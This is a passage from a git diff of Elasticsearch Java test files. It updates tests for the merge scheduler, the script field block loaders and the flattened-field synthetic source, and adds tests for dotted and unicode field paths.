"[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " - + "and will be removed in a future release. See the breaking changes documentation for the next major version." - ); - } } public void testAbortingOrRunningMergeTaskHoldsUpBudget() throws Exception { @@ -564,7 +558,7 @@ public void testAbortingOrRunningMergeTaskHoldsUpBudget() throws Exception { testDoneLatch.await(); return null; }).when(stallingMergeTask).abort(); - threadPoolMergeExecutorService.submitMergeTask(stallingMergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(stallingMergeTask)); // assert the merge task is holding up disk space budget expectedAvailableBudget.set(expectedAvailableBudget.get() - taskBudget); assertBusy( @@ -574,7 +568,7 @@ public void testAbortingOrRunningMergeTaskHoldsUpBudget() throws Exception { ThreadPoolMergeScheduler.MergeTask mergeTask = mock(ThreadPoolMergeScheduler.MergeTask.class); when(mergeTask.estimatedRemainingMergeSize()).thenReturn(randomLongBetween(0L, expectedAvailableBudget.get())); when(mergeTask.schedule()).thenReturn(RUN); - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); assertBusy(() -> { verify(mergeTask).schedule(); verify(mergeTask).run(); @@ -595,12 +589,6 @@ public void testAbortingOrRunningMergeTaskHoldsUpBudget() throws Exception { assertThat(threadPoolMergeExecutorService.allDone(), is(true)); }); } - if (setThreadPoolMergeSchedulerSetting) { - assertWarnings( - "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " - + "and will be removed in a future release. See the breaking changes documentation for the next major version." - ); - } } public void testBackloggedMergeTasksDoNotHoldUpBudget() throws Exception { @@ -654,7 +642,7 @@ && randomBoolean()) { testDoneLatch.await(); return null; }).when(mergeTask).abort(); - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); if (mergeTask.schedule() == RUN) { runningMergeTasks.add(mergeTask); } else { @@ -679,7 +667,7 @@ && randomBoolean()) { return RUN; } }).when(mergeTask).schedule(); - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); backloggingMergeTasksScheduleCountMap.put(mergeTask, 1); } int checkRounds = randomIntBetween(1, 10); @@ -712,7 +700,7 @@ && randomBoolean()) { long taskBudget = randomLongBetween(1L, backloggedMergeTaskDiskSpaceBudget); when(mergeTask.estimatedRemainingMergeSize()).thenReturn(taskBudget); when(mergeTask.schedule()).thenReturn(RUN); - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); assertBusy(() -> { verify(mergeTask).schedule(); verify(mergeTask).run(); @@ -739,12 +727,6 @@ && randomBoolean()) { assertThat(threadPoolMergeExecutorService.allDone(), is(true)); }); } - if (setThreadPoolMergeSchedulerSetting) { - assertWarnings( - "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " - + "and will be removed in a future release. See the breaking changes documentation for the next major version." - ); - } } public void testUnavailableBudgetBlocksNewMergeTasksFromStartingExecution() throws Exception { @@ -789,16 +771,8 @@ public void testUnavailableBudgetBlocksNewMergeTasksFromStartingExecution() thro while (submittedMergesCount > 0 && expectedAvailableBudget.get() > 0L) { ThreadPoolMergeScheduler.MergeTask mergeTask = mock(ThreadPoolMergeScheduler.MergeTask.class); when(mergeTask.supportsIOThrottling()).thenReturn(randomBoolean()); - doAnswer(mock -> { - Schedule schedule = randomFrom(Schedule.values()); - if (schedule == BACKLOG) { - testThreadPool.executor(ThreadPool.Names.GENERIC).execute(() -> { - // re-enqueue backlogged merge task - threadPoolMergeExecutorService.reEnqueueBackloggedMergeTask(mergeTask); - }); - } - return schedule; - }).when(mergeTask).schedule(); + // avoid backlogging and re-enqueing merge tasks in this test because it makes the queue's available budget unsteady + when(mergeTask.schedule()).thenReturn(randomFrom(RUN, ABORT)); // let some task complete, which will NOT hold up any budget if (randomBoolean()) { // this task will NOT hold up any budget because it runs quickly (it is not blocked) @@ -823,7 +797,7 @@ public void testUnavailableBudgetBlocksNewMergeTasksFromStartingExecution() thro runningOrAbortingMergeTasksList.add(mergeTask); latchesBlockingMergeTasksList.add(blockMergeTaskLatch); } - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); } // currently running (or aborting) merge tasks have consumed some of the available budget while (runningOrAbortingMergeTasksList.isEmpty() == false) { @@ -855,8 +829,8 @@ public void testUnavailableBudgetBlocksNewMergeTasksFromStartingExecution() thro // merge task 2 can run because it is under budget when(mergeTask2.estimatedRemainingMergeSize()).thenReturn(underBudget); } - threadPoolMergeExecutorService.submitMergeTask(mergeTask1); - threadPoolMergeExecutorService.submitMergeTask(mergeTask2); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask1)); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask2)); assertBusy(() -> { if (task1Runs) { verify(mergeTask1).schedule(); @@ -890,12 +864,6 @@ public void testUnavailableBudgetBlocksNewMergeTasksFromStartingExecution() thro bFileStore.usableSpace = Long.MAX_VALUE; assertBusy(() -> assertThat(threadPoolMergeExecutorService.allDone(), is(true))); } - if (setThreadPoolMergeSchedulerSetting) { - assertWarnings( - "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " - + "and will be removed in a future release. See the breaking changes documentation for the next major version." - ); - } } public void testEnqueuedMergeTasksAreUnblockedWhenEstimatedMergeSizeChanges() throws Exception { @@ -924,8 +892,8 @@ public void testEnqueuedMergeTasksAreUnblockedWhenEstimatedMergeSizeChanges() th assertBusy( () -> assertThat(threadPoolMergeExecutorService.getDiskSpaceAvailableForNewMergeTasks(), is(expectedAvailableBudget.get())) ); - List tasksRunList = new ArrayList<>(); - List tasksAbortList = new ArrayList<>(); + Set tasksRunList = ConcurrentCollections.newConcurrentSet(); + Set tasksAbortList = ConcurrentCollections.newConcurrentSet(); int submittedMergesCount = randomIntBetween(1, 5); long[] mergeSizeEstimates = new long[submittedMergesCount]; for (int i = 0; i < submittedMergesCount; i++) { @@ -990,12 +958,6 @@ public void testEnqueuedMergeTasksAreUnblockedWhenEstimatedMergeSizeChanges() th } }); } - if (setThreadPoolMergeSchedulerSetting) { - assertWarnings( - "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " - + "and will be removed in a future release. See the breaking changes documentation for the next major version." - ); - } } public void testMergeTasksAreUnblockedWhenMoreDiskSpaceBecomesAvailable() throws Exception { @@ -1058,7 +1020,7 @@ public void testMergeTasksAreUnblockedWhenMoreDiskSpaceBecomesAvailable() throws testDoneLatch.await(); return null; }).when(mergeTask).abort(); - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); if (mergeTask.schedule() == RUN) { runningMergeTasks.add(mergeTask); } else { @@ -1083,7 +1045,7 @@ public void testMergeTasksAreUnblockedWhenMoreDiskSpaceBecomesAvailable() throws when(mergeTask.estimatedRemainingMergeSize()).thenReturn(taskBudget); Schedule schedule = randomFrom(RUN, ABORT); when(mergeTask.schedule()).thenReturn(schedule); - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); if (schedule == RUN) { overBudgetTasksToRunList.add(mergeTask); } else { @@ -1150,11 +1112,5 @@ public void testMergeTasksAreUnblockedWhenMoreDiskSpaceBecomesAvailable() throws ); }); } - if (setThreadPoolMergeSchedulerSetting) { - assertWarnings( - "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " - + "and will be removed in a future release. See the breaking changes documentation for the next major version." - ); - } } } diff --git a/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceTests.java b/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceTests.java index cec52af12cade..2417ee3abf8d2 100644 --- a/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceTests.java +++ b/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceTests.java @@ -51,7 +51,6 @@ import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.greaterThanOrEqualTo; -import static org.hamcrest.Matchers.hasItem; import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.lessThan; import static org.hamcrest.Matchers.lessThanOrEqualTo; @@ -329,7 +328,7 @@ public void testIORateIsAdjustedForAllRunningMergeTasks() throws Exception { ThreadPoolExecutor threadPoolExecutor = (ThreadPoolExecutor) testThreadPool.executor(ThreadPool.Names.MERGE); Semaphore runMergeSemaphore = new Semaphore(0); Set currentlyRunningMergeTasksSet = ConcurrentCollections.newConcurrentSet(); - Set currentlyRunningOrAbortingMergeTasksSet = ConcurrentCollections.newConcurrentSet(); + while (mergesStillToComplete > 0) { if (mergesStillToSubmit > 0 && (currentlyRunningMergeTasksSet.isEmpty() || randomBoolean())) { MergeTask mergeTask = mock(MergeTask.class); @@ -347,27 +346,17 @@ public void testIORateIsAdjustedForAllRunningMergeTasks() throws Exception { }).when(mergeTask).schedule(); doAnswer(mock -> { currentlyRunningMergeTasksSet.add(mergeTask); - currentlyRunningOrAbortingMergeTasksSet.add(mergeTask); // wait to be signalled before completing runMergeSemaphore.acquire(); - currentlyRunningOrAbortingMergeTasksSet.remove(mergeTask); currentlyRunningMergeTasksSet.remove(mergeTask); return null; }).when(mergeTask).run(); doAnswer(mock -> { - currentlyRunningOrAbortingMergeTasksSet.add(mergeTask); // wait to be signalled before completing runMergeSemaphore.acquire(); - currentlyRunningOrAbortingMergeTasksSet.remove(mergeTask); return null; }).when(mergeTask).abort(); - assertThat(runMergeSemaphore.availablePermits(), is(0)); - boolean isAnyExecutorAvailable = currentlyRunningOrAbortingMergeTasksSet.size() < mergeExecutorThreadCount; - boolean mergeTaskSubmitted = threadPoolMergeExecutorService.submitMergeTask(mergeTask); - assertTrue(mergeTaskSubmitted); - if (isAnyExecutorAvailable) { - assertBusy(() -> assertThat(currentlyRunningOrAbortingMergeTasksSet, hasItem(mergeTask))); - } + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); long latestIORate = threadPoolMergeExecutorService.getTargetIORateBytesPerSec(); // all currently running merge tasks must be IO throttled to the latest IO Rate assertBusy(() -> { diff --git a/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerTests.java b/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerTests.java index d88f7c67b0bbd..bea7697fd51c6 100644 --- a/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerTests.java +++ b/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerTests.java @@ -612,11 +612,12 @@ public void testSchedulerCloseWaitsForRunningMerge() throws Exception { fail(e); } }); + // test expects that there definitely is a running merge before closing the merge scheduler + mergeRunningLatch.await(); + // closes the merge scheduler t.start(); try { assertTrue(t.isAlive()); - // wait for the merge to actually run - mergeRunningLatch.await(); // ensure the merge scheduler is effectively "closed" assertBusy(() -> { MergeSource mergeSource2 = mock(MergeSource.class); diff --git a/server/src/test/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapperTests.java index 73d76ad48c955..6a81a93923abc 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapperTests.java @@ -125,7 +125,7 @@ private static void testBoundsBlockLoaderAux( for (int j : array) { expected.add(visitor.apply(geometries.get(j + currentIndex)).get()); } - try (var block = (TestBlock) loader.reader(leaf).read(TestBlock.factory(leafReader.numDocs()), TestBlock.docs(array))) { + try (var block = (TestBlock) loader.reader(leaf).read(TestBlock.factory(), TestBlock.docs(array), 0)) { for (int i = 0; i < block.size(); i++) { intArrayResults.add(block.get(i)); } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/BlockSourceReaderTests.java b/server/src/test/java/org/elasticsearch/index/mapper/BlockSourceReaderTests.java index 357ada3ad656d..1fa9c85a5c738 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/BlockSourceReaderTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/BlockSourceReaderTests.java @@ -59,7 +59,7 @@ private void loadBlock(LeafReaderContext ctx, Consumer test) throws I StoredFieldLoader.fromSpec(loader.rowStrideStoredFieldSpec()).getLoader(ctx, null), loader.rowStrideStoredFieldSpec().requiresSource() ? SourceLoader.FROM_STORED_SOURCE.leaf(ctx.reader(), null) : null ); - BlockLoader.Builder builder = loader.builder(TestBlock.factory(ctx.reader().numDocs()), 1); + BlockLoader.Builder builder = loader.builder(TestBlock.factory(), 1); storedFields.advanceTo(0); reader.read(0, storedFields, builder); TestBlock block = (TestBlock) builder.build(); diff --git a/server/src/test/java/org/elasticsearch/index/mapper/BooleanScriptFieldTypeTests.java b/server/src/test/java/org/elasticsearch/index/mapper/BooleanScriptFieldTypeTests.java index ce9a9bc0688f3..54656ab1af3ee 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/BooleanScriptFieldTypeTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/BooleanScriptFieldTypeTests.java @@ -446,7 +446,8 @@ public void testBlockLoader() throws IOException { try (DirectoryReader reader = iw.getReader()) { BooleanScriptFieldType fieldType = build("xor_param", Map.of("param", false), OnScriptError.FAIL); List expected = List.of(false, true); - assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType), equalTo(expected)); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 0), equalTo(expected)); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 1), equalTo(expected.subList(1, 2))); assertThat(blockLoaderReadValuesFromRowStrideReader(reader, fieldType), equalTo(expected)); } } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/DateScriptFieldTypeTests.java b/server/src/test/java/org/elasticsearch/index/mapper/DateScriptFieldTypeTests.java index 3d8ed5ea60262..1eb0ba07d58e2 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/DateScriptFieldTypeTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/DateScriptFieldTypeTests.java @@ -493,9 +493,10 @@ public void testBlockLoader() throws IOException { try (DirectoryReader reader = iw.getReader()) { DateScriptFieldType fieldType = build("add_days", Map.of("days", 1), OnScriptError.FAIL); assertThat( - blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType), + blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 0), equalTo(List.of(1595518581354L, 1595518581355L)) ); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 1), equalTo(List.of(1595518581355L))); assertThat(blockLoaderReadValuesFromRowStrideReader(reader, fieldType), equalTo(List.of(1595518581354L, 1595518581355L))); } } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/DoubleScriptFieldTypeTests.java b/server/src/test/java/org/elasticsearch/index/mapper/DoubleScriptFieldTypeTests.java index 140137015d98a..b1cda53876993 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/DoubleScriptFieldTypeTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/DoubleScriptFieldTypeTests.java @@ -262,7 +262,8 @@ public void testBlockLoader() throws IOException { ); try (DirectoryReader reader = iw.getReader()) { DoubleScriptFieldType fieldType = build("add_param", Map.of("param", 1), OnScriptError.FAIL); - assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType), equalTo(List.of(2d, 3d))); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 0), equalTo(List.of(2d, 3d))); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 1), equalTo(List.of(3d))); assertThat(blockLoaderReadValuesFromRowStrideReader(reader, fieldType), equalTo(List.of(2d, 3d))); } } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapperTests.java index 11e2305838705..423811c9e22a2 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapperTests.java @@ -10,12 +10,14 @@ package org.elasticsearch.index.mapper; import org.apache.lucene.index.DirectoryReader; +import org.elasticsearch.common.Strings; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.CheckedConsumer; import org.elasticsearch.core.Nullable; import org.elasticsearch.search.lookup.SourceFilter; import org.elasticsearch.test.FieldMaskingReader; import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xcontent.json.JsonXContent; import org.hamcrest.Matchers; import org.junit.Before; @@ -123,6 +125,15 @@ public void testIgnoredString() throws IOException { ); } + public void testIgnoredStringFullUnicode() throws IOException { + String value = randomUnicodeOfCodepointLengthBetween(5, 20); + String fieldName = randomUnicodeOfCodepointLength(5); + + String expected = Strings.toString(JsonXContent.contentBuilder().startObject().field(fieldName, value).endObject()); + + assertEquals(expected, getSyntheticSourceWithFieldLimit(b -> b.field(fieldName, value))); + } + public void testIgnoredInt() throws IOException { int value = randomInt(); assertEquals("{\"my_value\":" + value + "}", getSyntheticSourceWithFieldLimit(b -> b.field("my_value", value))); diff --git a/server/src/test/java/org/elasticsearch/index/mapper/IpScriptFieldTypeTests.java b/server/src/test/java/org/elasticsearch/index/mapper/IpScriptFieldTypeTests.java index 281d2993fa29c..7e9a236f6cc74 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/IpScriptFieldTypeTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/IpScriptFieldTypeTests.java @@ -273,7 +273,8 @@ public void testBlockLoader() throws IOException { new BytesRef(InetAddressPoint.encode(InetAddresses.forString("192.168.0.1"))), new BytesRef(InetAddressPoint.encode(InetAddresses.forString("192.168.1.1"))) ); - assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType), equalTo(expected)); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 0), equalTo(expected)); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 1), equalTo(expected.subList(1, 2))); assertThat(blockLoaderReadValuesFromRowStrideReader(reader, fieldType), equalTo(expected)); } } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/KeywordScriptFieldTypeTests.java b/server/src/test/java/org/elasticsearch/index/mapper/KeywordScriptFieldTypeTests.java index 57d52991a6442..ccc8ccac4deb4 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/KeywordScriptFieldTypeTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/KeywordScriptFieldTypeTests.java @@ -409,9 +409,10 @@ public void testBlockLoader() throws IOException { try (DirectoryReader reader = iw.getReader()) { KeywordScriptFieldType fieldType = build("append_param", Map.of("param", "-Suffix"), OnScriptError.FAIL); assertThat( - blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType), + blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 0), equalTo(List.of(new BytesRef("1-Suffix"), new BytesRef("2-Suffix"))) ); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 1), equalTo(List.of(new BytesRef("2-Suffix")))); assertThat( blockLoaderReadValuesFromRowStrideReader(reader, fieldType), equalTo(List.of(new BytesRef("1-Suffix"), new BytesRef("2-Suffix"))) diff --git a/server/src/test/java/org/elasticsearch/index/mapper/LongFieldMapperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/LongFieldMapperTests.java index 9a0f4baa8f21a..b68838ba71eb2 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/LongFieldMapperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/LongFieldMapperTests.java @@ -103,6 +103,9 @@ public void testLongIndexingCoercesIntoRange() throws Exception { assertThat(doc.rootDoc().getFields("field"), hasSize(1)); } + // This is the biggest long that double can represent exactly + public static final long MAX_SAFE_LONG_FOR_DOUBLE = 1L << 53; + @Override protected Number randomNumber() { if (randomBoolean()) { @@ -111,13 +114,8 @@ protected Number randomNumber() { if (randomBoolean()) { return randomDouble(); } - assumeFalse("https://github.com/elastic/elasticsearch/issues/70585", true); - return randomDoubleBetween(Long.MIN_VALUE, Long.MAX_VALUE, true); - } - - @AwaitsFix(bugUrl = "https://github.com/elastic/elasticsearch/issues/70585") - public void testFetchCoerced() throws IOException { - assertFetch(randomFetchTestMapper(), "field", 3.783147882954537E18, randomFetchTestFormat()); + // TODO: increase the range back to full LONG range once https://github.com/elastic/elasticsearch/issues/132893 is fixed + return randomDoubleBetween(-MAX_SAFE_LONG_FOR_DOUBLE, MAX_SAFE_LONG_FOR_DOUBLE, true); } protected IngestScriptSupport ingestScriptSupport() { diff --git a/server/src/test/java/org/elasticsearch/index/mapper/LongScriptFieldTypeTests.java b/server/src/test/java/org/elasticsearch/index/mapper/LongScriptFieldTypeTests.java index a8cb4d51c5efa..01f96a1a4b1be 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/LongScriptFieldTypeTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/LongScriptFieldTypeTests.java @@ -295,7 +295,8 @@ public void testBlockLoader() throws IOException { ); try (DirectoryReader reader = iw.getReader()) { LongScriptFieldType fieldType = build("add_param", Map.of("param", 1), OnScriptError.FAIL); - assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType), equalTo(List.of(2L, 3L))); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 0), equalTo(List.of(2L, 3L))); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 1), equalTo(List.of(3L))); assertThat(blockLoaderReadValuesFromRowStrideReader(reader, fieldType), equalTo(List.of(2L, 3L))); } } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/blockloader/TextFieldBlockLoaderTests.java b/server/src/test/java/org/elasticsearch/index/mapper/blockloader/TextFieldBlockLoaderTests.java index 77c42740451ee..ce5482b15b0ee 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/blockloader/TextFieldBlockLoaderTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/blockloader/TextFieldBlockLoaderTests.java @@ -27,6 +27,9 @@ public TextFieldBlockLoaderTests(Params params) { @Override protected Object expected(Map fieldMapping, Object value, TestContext testContext) { + logger.info("field mapping={}", fieldMapping); + logger.info("value={}", value); + logger.info("params={}", params.toString()); return expectedValue(fieldMapping, value, params, testContext); } @@ -82,7 +85,8 @@ public static Object expectedValue(Map fieldMapping, Object valu .map(BytesRef::new) .collect(Collectors.toList()); - if (store == false) { + String ssk = (String) keywordMultiFieldMapping.get("synthetic_source_keep"); + if (store == false && "arrays".equals(ssk) == false) { // using doc_values for synthetic source indexed = new ArrayList<>(new HashSet<>(indexed)); indexed.sort(BytesRef::compareTo); diff --git a/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldMapperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldMapperTests.java index c6062efc744d9..0628ca47308ea 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldMapperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldMapperTests.java @@ -931,6 +931,56 @@ public void testSyntheticSourceWithEmptyObject() throws IOException { {"field":{"key1":"foo"}}""")); } + public void testSyntheticSourceWithMatchesInNestedPath() throws IOException { + DocumentMapper mapper = createSytheticSourceMapperService( + mapping(b -> { b.startObject("field").field("type", "flattened").endObject(); }) + ).documentMapper(); + + // This test covers a scenario that previously had a bug. + // Since a.b.c and b.b.d have a matching middle key `b`, and b.b.d starts with a `b`, + // startObject was not called for the first `b` in b.b.d. + // For a full explanation see this comment: https://github.com/elastic/elasticsearch/pull/129600#issuecomment-3024476134 + var syntheticSource = syntheticSource(mapper, b -> { + b.startObject("field"); + { + b.startObject("a"); + { + b.startObject("b").field("c", "1").endObject(); + } + b.endObject(); + b.startObject("b"); + { + b.startObject("b").field("d", "2").endObject(); + } + b.endObject(); + } + b.endObject(); + }); + assertThat(syntheticSource, equalTo(""" + {"field":{"a":{"b":{"c":"1"}},"b":{"b":{"d":"2"}}}}""")); + } + + public void testMultipleDotsInPath() throws IOException { + DocumentMapper mapper = createSytheticSourceMapperService( + mapping(b -> { b.startObject("field").field("type", "flattened").endObject(); }) + ).documentMapper(); + + var syntheticSource = syntheticSource(mapper, b -> { + b.startObject("field"); + { + b.startObject("."); + { + b.field(".", "bar"); + } + b.endObject(); + } + b.endObject(); + }); + // This behavior is weird to say the least. But this is the only reasonable way to interpret the meaning of the path `...` + assertThat(syntheticSource, equalTo(""" + {"field":{"":{"":{"":{"":"bar"}}}}}""")); + } + @Override protected boolean supportsCopyTo() { return false; diff --git a/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelperTests.java index 4ca5da1c42d40..f59640194f8cd 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelperTests.java @@ -21,6 +21,7 @@ import java.nio.charset.StandardCharsets; import java.util.List; import java.util.stream.Collectors; +import java.util.stream.Stream; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; @@ -246,6 +247,54 @@ public void testScalarObjectMismatchInNestedObject() throws IOException { assertEquals("{\"a\":{\"b\":{\"c\":\"10\",\"c.d\":\"20\"}}}", baos.toString(StandardCharsets.UTF_8)); } + public void testSingleDotPath() throws IOException { + // GIVEN + final SortedSetDocValues dv = mock(SortedSetDocValues.class); + final FlattenedFieldSyntheticWriterHelper writer = new FlattenedFieldSyntheticWriterHelper(new SortedSetSortedKeyedValues(dv)); + final ByteArrayOutputStream baos = new ByteArrayOutputStream(); + final XContentBuilder builder = new XContentBuilder(XContentType.JSON.xContent(), baos); + final List bytes = Stream.of("." + '\0' + "10").map(x -> x.getBytes(StandardCharsets.UTF_8)).toList(); + when(dv.getValueCount()).thenReturn(Long.valueOf(bytes.size())); + when(dv.docValueCount()).thenReturn(bytes.size()); + for (int i = 0; i < bytes.size(); i++) { + when(dv.nextOrd()).thenReturn((long) i); + when(dv.lookupOrd(ArgumentMatchers.eq((long) i))).thenReturn(new BytesRef(bytes.get(i), 0, bytes.get(i).length)); + } + + // WHEN + builder.startObject(); + writer.write(builder); + builder.endObject(); + builder.flush(); + + // THEN + assertEquals("{\"\":{\"\":\"10\"}}", baos.toString(StandardCharsets.UTF_8)); + } + + public void testTrailingDotsPath() throws IOException { + // GIVEN + final SortedSetDocValues dv = mock(SortedSetDocValues.class); + final FlattenedFieldSyntheticWriterHelper writer = new FlattenedFieldSyntheticWriterHelper(new SortedSetSortedKeyedValues(dv)); + final ByteArrayOutputStream baos = new ByteArrayOutputStream(); + final XContentBuilder builder = new XContentBuilder(XContentType.JSON.xContent(), baos); + final List bytes = Stream.of("cat.." + '\0' + "10").map(x -> x.getBytes(StandardCharsets.UTF_8)).toList(); + when(dv.getValueCount()).thenReturn(Long.valueOf(bytes.size())); + when(dv.docValueCount()).thenReturn(bytes.size()); + for (int i = 0; i < bytes.size(); i++) { + when(dv.nextOrd()).thenReturn((long) i); + when(dv.lookupOrd(ArgumentMatchers.eq((long) i))).thenReturn(new BytesRef(bytes.get(i), 0, bytes.get(i).length)); + } + + // WHEN + builder.startObject(); + writer.write(builder); + builder.endObject(); + builder.flush(); + + // THEN + assertEquals("{\"cat\":{\"\":{\"\":\"10\"}}}", baos.toString(StandardCharsets.UTF_8)); + } + private class SortedSetSortedKeyedValues implements FlattenedFieldSyntheticWriterHelper.SortedKeyedValues { private final SortedSetDocValues dv; private int seen = 0; diff --git a/server/src/test/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapperTests.java index 8f17dfa8fd56e..b9dcb88189bec 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapperTests.java @@ -68,6 +68,7 @@ import static org.apache.lucene.tests.index.BaseKnnVectorsFormatTestCase.randomNormalizedVector; import static org.elasticsearch.index.codec.vectors.IVFVectorsFormat.DYNAMIC_NPROBE; import static org.elasticsearch.index.mapper.vectors.DenseVectorFieldMapper.DEFAULT_OVERSAMPLE; +import static org.elasticsearch.index.mapper.vectors.DenseVectorFieldMapper.INDEXED_BY_DEFAULT_INDEX_VERSION; import static org.elasticsearch.index.mapper.vectors.DenseVectorFieldMapper.IVF_FORMAT; import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; @@ -107,7 +108,7 @@ private void indexMapping(XContentBuilder b, IndexVersion indexVersion) throws I if (elementType != ElementType.FLOAT) { b.field("element_type", elementType.toString()); } - if (indexVersion.onOrAfter(DenseVectorFieldMapper.INDEXED_BY_DEFAULT_INDEX_VERSION) || indexed) { + if (indexVersion.onOrAfter(INDEXED_BY_DEFAULT_INDEX_VERSION) || indexed) { // Serialize if it's new index version, or it was not the default for previous indices b.field("index", indexed); } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/vectors/SparseVectorFieldMapperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/vectors/SparseVectorFieldMapperTests.java index 